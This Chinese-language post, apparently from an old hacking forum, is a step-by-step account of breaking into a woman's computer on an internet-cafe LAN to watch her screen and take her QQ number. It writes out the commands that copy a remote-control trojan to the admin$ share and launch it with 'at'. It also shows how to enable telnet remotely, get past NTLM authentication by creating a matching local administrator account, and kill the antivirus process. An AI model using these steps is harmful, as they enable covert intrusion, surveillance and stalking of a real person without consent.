现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...

这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....
午夜激情QQ群：39981011

　　下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个

　　web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

　　web控制台

　　一个直接在IE栏里输入对方IP就可以控制对方机器的小软件，也就是所谓的B/S模式的控制。用起来很方便，对方运行了服务端后，你在IE栏里直接输入对方IP就可以控制了，也可以通过刷新来实现重复抓屏。

　　可以在我网络盘里下到


　　综合工具里有个 webserver.rar

　　接着

　　G:/>copy webserver.exe //192.168.0.225/admin$

　　已复制 1 个文件。

　　G:/>net time //192.168.0.225

　　//192.168.0.225 的当前时间是 2005/2/5 下午 05:00

　　命令成功完成。

G:/>at //192.168.0.225 17:02 webserver.exe

　　用AT命令启动webserver.exe.

　　2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

　　FT....我说那.

　　难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

　　还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

打开控制面板--管理工具--计算机管理

　　操作-连接到另一计算机.

　　然后输入IP192.168.0.225



图5

　　呵.等一会就可以看到成功了...你看到了什么?

　　更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务



OK了...

　　本地打开一cmd

　　输入

　　G:/>telnet 192.168.0.225

　　回车后出现

　　Server allows NTLM authentication only

　　Server has closed connection



需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.

　　ntlm.exe在《流光》的Tools目录中有的...

　　没工具怎么办呢..

　　我们在本地添加一和远程主机同样的用户名

　　输入

　　net user user04 /add 添加user04密码为空的用户

　　net localgroup administrators user04 /add 把user04加入管理员组

　　然后来到G:/Winnt/system32下找到CMD.exe

　　右击.创建快捷方式.然后在快捷方式 CMD右击..属性.

　　在以其他用户身份运行前打勾...



快捷方式 CMD

　　弹出窗口.在用户名处输入user04密码为空



然后

　　telnet 192.168.0.225

　　回车..哈哈...拿到shell了....

　　接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东

　　coy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程

　　这下把瑞星给关了.还怕他提示有毒

　　接着执行webserver.exe

　　在IE里输入

　　192.168.0.225



看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...

　　好了她的QQ号码也拿到手了..加了她去聊聊去

本站资源均具有真实性 更多相关资讯敬请关注我们